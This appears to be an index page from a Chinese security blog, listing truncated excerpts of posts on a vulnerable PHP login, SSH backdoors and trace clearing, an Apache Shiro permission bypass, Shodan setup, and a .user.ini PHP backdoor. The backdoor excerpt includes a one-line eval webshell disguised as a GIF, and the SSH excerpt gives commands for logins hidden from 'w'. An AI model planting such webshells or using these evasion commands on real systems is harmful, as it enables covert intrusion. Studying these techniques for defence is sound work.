PHP 登录(有sql注入和越权)
#0x01 login.html页面<html>
<form name="login" action="login.php" method="post"></br>
name:<input type="text" name="us...
阅读全文
SSH后门和清除痕迹
隐藏的远程登录(w 看不到)ssh -T user @ host /bin/bash -i 或隐藏的远程登录(w 看不到)ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -if 对于SSH来说,...
阅读全文
PHP实现(非ajax)提交数据后刷新页面
#0x01 数据库链接 conn.php<?php
$con = mysql_connect("localhost","root","123123aa");
if (!$con)
{
die('连接失败: ' . mysql_error());
}
mysql_...
阅读全文
ubuntu下安装docker并在docker中安装lamp
1.安装docker
root@ubuntu: sudo apt-get install software-properties-common #增加 add-apt-repository 命令
root@ubuntu: sudo apt-get install pytho...
阅读全文
Apache Shiro CVE-2016-6802 权限绕过漏洞
关于Apche shiro权限Bypass漏洞,漏洞代码段
public static String getContextPath(HttpServletRequest request) {
String contextPath = (String) request.g...
阅读全文
woobuntu安装shodan,进行命令行搜索
安装方法:一.通过python的easy_install 安装easy_install shodan二.配置你的shodan api key,这个可以注册shodan,然后在个人账号信息页面可以看到shodan init YOUR_API_KEY ...
阅读全文
.user.ini文件构成的PHP后门
在同一目录下存在三个文件:第一个: .user.ini
内容为:auto_prepend_file=test.gif第二个: test.gif
内容为:<?php @eval ($_POST[123]); ?>第三个:任意一个php文件,可以是原系统自带的...
阅读全文